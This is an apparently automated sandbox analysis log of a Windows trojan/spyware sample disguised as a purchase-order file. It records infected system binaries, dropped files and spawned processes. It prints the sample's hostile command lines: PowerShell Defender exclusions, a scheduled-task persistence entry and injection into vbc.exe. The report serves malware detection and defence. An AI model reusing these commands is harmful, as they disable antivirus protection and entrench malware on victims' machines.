                  Source: AdobeARMHelper.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jucheck.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jusched.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FXSSVC.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdate.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateBroker.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateComRegisterShell64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateCore.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateOnDemand.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jabswitch.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java-rmi.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: PerceptionSimulationService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: perfhost.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MsSense.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SensorDataService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: snmptrap.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Spectrum.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssh-agent.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javacpl.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: TieringEngineService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AgentService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: vds.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSSVC.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WmiApSrv.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wmpnetwk.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: YRtQgzFlDnVSru.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: Section: .rsrc ZLIB complexity 0.9989003576744956
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: Section: .rsrc ZLIB complexity 0.9989003576744956
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@36/178@44/6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_004019F0 OleInitialize,_getenv,CreateToolhelp32Snapshot,Module32First,CloseHandle,_malloc,_memset,_memset,_malloc,_memset,LoadLibraryA,SafeArrayDestroy,42_2_004019F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F6CBD0 StrStrIW,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,StartServiceW,9_2_00F6CBD0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeFile created: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                  Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-f1a1dcf99c90d8299ea72c54-b
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-f1a1dcf99c90d829-inf
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMutant created: \Sessions\1\BaseNamedObjects\eRbCIIGBDGKZR
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-f1a1dcf99c90d8299e7986a9-b
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE707.tmpJump to behavior
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: vbc.exe, 00000009.00000002.2696625029.0000000007915000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.00000000078E6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.00000000078F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.00000000078D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.0000000007909000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000078A6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000078B6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000078E5000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2688454630.00000000087CB000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000078D9000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000078C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeReversingLabs: Detection: 28%
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeFile read: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                  Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                  Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                  Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                  Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe
                  Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                  Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                  Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
                  Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                  Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
                  Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
                  Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
                  Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                  Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp"
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp"
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: wintypes.dllJump to behavior
